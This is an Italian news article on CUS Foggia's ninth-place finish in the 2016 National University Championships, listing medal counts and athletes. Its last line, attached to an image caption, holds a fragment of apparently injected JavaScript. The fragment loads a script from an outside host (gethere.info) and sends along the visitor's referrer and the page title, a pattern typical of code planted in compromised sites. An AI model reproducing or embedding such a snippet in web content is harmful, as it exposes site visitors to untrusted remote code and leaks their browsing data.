.
News
  • Home

Il Cus Foggia nella top ten dei CNU2016

di trarre 0
28 Giu 2016

Cinque medaglie d’oro, due argenti, cinque bronzi. Il bottino conquistato dal CUS Foggia in terra emiliana vale un piazzamento d’onore nella classifica definitiva del medagliere dei CNU 2016. 

La graduatoria finale pubblicata sul sito http://www.cnu2016.it parla chiaro: le vittorie ottenute a Modena e Reggio Emilia collocano la squadra del Centro Universitario dell’Università di Foggia al nono posto, alle spalle del Cus Genova e prima del Cus Padova e del Cus Bari.

Ad aggiudicarsi il titolo di Campione d’Italia è stato il Cus Milano. La compagine meneghina ha chiuso l’edizione primaverile dei Campionati Nazionali Universitari con 13 ori, 17 argenti e 14 bronzi.

classifica cnu

Un anno fa il Cus Foggia conquistò lo stesso numero di medaglie, 12, ma un oro in meno (4), terminando al 12° posto tra i Cus partecipanti.

Loris Di Bello (karate), Maristella Smiraglia (taekwondo) e Martina Criscio (scherma) sono riusciti nell’impresa di confermarsi campioni italiani nelle rispettive discipline. Primi titoli universitari per Francesco Fortunato (marcia) e Ciro Tomaselli (scherma).

Questo il riepilogo grafico dei podi targati Cus Foggia:

medaglie cuss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;